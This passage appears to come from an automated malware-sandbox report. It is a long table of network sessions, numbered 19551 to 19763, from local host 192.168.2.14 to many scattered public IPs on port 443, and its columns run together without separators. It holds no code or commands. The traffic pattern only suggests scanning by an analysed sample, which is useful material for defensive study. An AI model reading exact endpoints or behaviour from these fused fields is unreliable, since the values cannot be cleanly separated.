                                                        19551192.168.2.146007861.150.212.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19552192.168.2.1450140205.81.203.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19553192.168.2.1447650124.159.51.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19554192.168.2.143722076.44.0.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19555192.168.2.1455676151.62.12.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19556192.168.2.146051212.136.63.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19557192.168.2.145423479.24.209.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19558192.168.2.1455966139.30.58.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19559192.168.2.1435482131.138.217.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19560192.168.2.146077250.106.185.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19561192.168.2.1445678134.164.222.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19562192.168.2.1449792212.161.24.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19563192.168.2.14569585.176.96.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19564192.168.2.145549897.148.14.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19565192.168.2.1453440132.173.230.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19566192.168.2.1453652221.239.213.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19567192.168.2.1441462151.167.101.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19568192.168.2.145343886.231.248.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19569192.168.2.1460076162.54.100.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19570192.168.2.144373440.58.26.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19571192.168.2.1448504172.5.74.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19572192.168.2.1455592179.50.30.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19573192.168.2.143706696.98.196.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19574192.168.2.144238239.7.18.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19575192.168.2.1443256174.13.232.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19576192.168.2.145881845.60.136.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19577192.168.2.1458498120.212.253.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19578192.168.2.1445662160.130.125.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19579192.168.2.1441020179.39.77.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19580192.168.2.145807023.20.64.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19581192.168.2.1453406138.128.68.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19582192.168.2.1433704137.114.75.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19583192.168.2.14345165.123.53.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19584192.168.2.143460072.217.209.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19585192.168.2.144292880.107.197.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19586192.168.2.1445994137.238.58.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19587192.168.2.144443070.175.155.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19588192.168.2.1445958110.183.142.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19589192.168.2.1439802212.233.60.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19590192.168.2.1449572113.59.93.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19591192.168.2.145475238.20.253.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19592192.168.2.1459030192.250.5.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19593192.168.2.143735053.114.70.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19594192.168.2.1440412143.210.163.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19595192.168.2.1441860119.86.35.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19596192.168.2.1440014161.61.202.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19597192.168.2.1440242175.252.234.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19598192.168.2.1455218157.20.187.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19599192.168.2.14605245.24.168.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19600192.168.2.145789849.54.172.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19601192.168.2.1437722204.243.249.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19602192.168.2.1457446183.133.170.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19603192.168.2.1453356128.166.217.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19604192.168.2.1456240165.188.204.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19605192.168.2.143477692.32.230.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19606192.168.2.1457698114.93.219.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19607192.168.2.144311882.163.220.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19608192.168.2.144282043.205.48.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19609192.168.2.1435056206.63.215.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19610192.168.2.1439274183.57.14.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19611192.168.2.14364425.152.35.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19612192.168.2.1449036141.248.46.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19613192.168.2.146043062.252.249.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19614192.168.2.1442998221.88.6.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19615192.168.2.144240614.17.100.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19616192.168.2.143531420.228.84.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19617192.168.2.1439286188.95.151.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19618192.168.2.144629885.45.40.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19619192.168.2.1452874136.194.6.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19620192.168.2.146020880.166.26.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19621192.168.2.1453812180.192.156.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19622192.168.2.145389425.84.195.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19623192.168.2.1455850155.180.81.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19624192.168.2.143474439.238.93.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19625192.168.2.1446024212.17.218.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19626192.168.2.1450380221.145.56.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19627192.168.2.144389462.238.240.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19628192.168.2.1434490193.172.103.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19629192.168.2.1448874185.57.210.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19630192.168.2.1436666107.16.166.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19631192.168.2.144148670.59.31.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19632192.168.2.1441424192.131.34.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19633192.168.2.1453814177.20.203.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19634192.168.2.1448596219.16.207.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19635192.168.2.1447098176.104.11.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19636192.168.2.1435694221.196.112.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19637192.168.2.143769653.96.76.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19638192.168.2.144083293.53.69.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19639192.168.2.1457006169.67.14.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19640192.168.2.145027858.201.143.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19641192.168.2.1440140183.137.228.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19642192.168.2.1436094223.144.99.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19643192.168.2.146022287.201.104.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19644192.168.2.1453800171.209.20.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19645192.168.2.143300887.92.126.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19646192.168.2.1445776143.115.253.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19647192.168.2.1439712123.85.62.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19648192.168.2.144208417.173.70.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19649192.168.2.144020812.128.255.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19650192.168.2.1457144156.189.157.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19651192.168.2.143859867.173.21.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19652192.168.2.1437056114.239.208.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19653192.168.2.1456042176.211.38.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19654192.168.2.144343468.125.197.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19655192.168.2.145950638.209.185.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19656192.168.2.143961819.76.199.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19657192.168.2.1435974182.214.18.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19658192.168.2.1434864192.194.195.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19659192.168.2.144545682.50.193.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19660192.168.2.1452924190.58.28.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19661192.168.2.1440286206.6.16.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19662192.168.2.1437130126.75.64.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19663192.168.2.1437542207.96.76.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19664192.168.2.145728063.15.111.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19665192.168.2.1440260163.23.220.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19666192.168.2.1445754116.119.136.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19667192.168.2.1448004114.162.248.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19668192.168.2.1448638208.153.56.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19669192.168.2.144878868.3.202.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19670192.168.2.1455826211.232.165.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19671192.168.2.1442388136.102.79.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19672192.168.2.143861691.143.115.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19673192.168.2.1433956188.36.128.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19674192.168.2.145113854.69.125.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19675192.168.2.146066843.40.12.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19676192.168.2.1451694202.53.250.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19677192.168.2.1441754161.232.117.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19678192.168.2.1439990205.45.238.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19679192.168.2.1442266177.104.174.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19680192.168.2.1442168161.174.146.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19681192.168.2.1441442155.255.34.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19682192.168.2.1459306177.130.199.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19683192.168.2.1444222196.65.125.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19684192.168.2.145933437.196.72.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19685192.168.2.145951276.23.142.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19686192.168.2.1434566157.125.73.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19687192.168.2.1455862140.181.78.235443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19688192.168.2.1438250218.195.79.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19689192.168.2.1457048147.44.44.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19690192.168.2.145083872.194.11.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19691192.168.2.143895217.42.203.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19692192.168.2.1456140204.181.48.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19693192.168.2.1451214170.58.118.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19694192.168.2.1440930182.37.36.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19695192.168.2.1446610188.71.104.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19696192.168.2.1457020100.211.197.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19697192.168.2.143918274.254.165.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19698192.168.2.14390925.161.109.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19699192.168.2.145895857.58.167.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19700192.168.2.144489884.186.87.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19701192.168.2.1459746179.75.150.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19702192.168.2.144771471.167.83.31443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19703192.168.2.1437738159.214.248.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19704192.168.2.1447558114.214.66.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19705192.168.2.145765250.230.169.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19706192.168.2.1442500114.161.228.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19707192.168.2.145123887.68.151.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19708192.168.2.1440738202.31.171.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19709192.168.2.145111436.78.183.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19710192.168.2.1437198128.149.218.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19711192.168.2.144628044.152.122.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19712192.168.2.1432982163.157.132.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19713192.168.2.1459072119.146.218.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19714192.168.2.1459556165.225.125.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19715192.168.2.1454758186.126.66.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19716192.168.2.1453890106.58.97.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19717192.168.2.143579492.242.245.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19718192.168.2.144030293.123.128.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19719192.168.2.145146476.242.7.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19720192.168.2.1459494134.250.205.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19721192.168.2.143514270.229.254.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19722192.168.2.145015853.205.24.102443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19723192.168.2.144066818.225.191.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19724192.168.2.144052039.195.250.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19725192.168.2.145965445.193.126.137443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19726192.168.2.1448904157.43.71.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19727192.168.2.1453978112.139.194.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19728192.168.2.1437986131.78.181.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19729192.168.2.146041894.147.73.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19730192.168.2.14354742.19.189.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19731192.168.2.1440034151.47.88.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19732192.168.2.1456706107.122.77.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19733192.168.2.1433480143.99.230.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19734192.168.2.1440570170.14.216.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19735192.168.2.1445676137.114.23.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19736192.168.2.1440706121.164.103.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19737192.168.2.1448596186.122.50.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19738192.168.2.1457584169.140.73.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19739192.168.2.14408948.40.87.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19740192.168.2.144357290.28.169.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19741192.168.2.1444308178.98.248.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19742192.168.2.145527861.64.245.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19743192.168.2.1436226152.85.61.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19744192.168.2.144837013.154.172.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19745192.168.2.1458976195.64.51.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19746192.168.2.1452336170.91.244.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19747192.168.2.1439686134.227.116.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19748192.168.2.1435106148.213.131.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19749192.168.2.1440334108.23.119.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19750192.168.2.1446854191.128.247.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19751192.168.2.1443250206.154.206.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19752192.168.2.1458556148.74.76.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19753192.168.2.145596614.147.116.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19754192.168.2.1450062139.253.161.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19755192.168.2.1440348137.161.147.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19756192.168.2.144791071.17.47.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19757192.168.2.144253032.122.46.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19758192.168.2.1433826192.33.128.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19759192.168.2.1456142171.144.156.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19760192.168.2.1456588199.27.34.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19761192.168.2.1450718187.39.126.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19762192.168.2.143790873.11.196.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19763192.168.2.145201684.113.97.165443
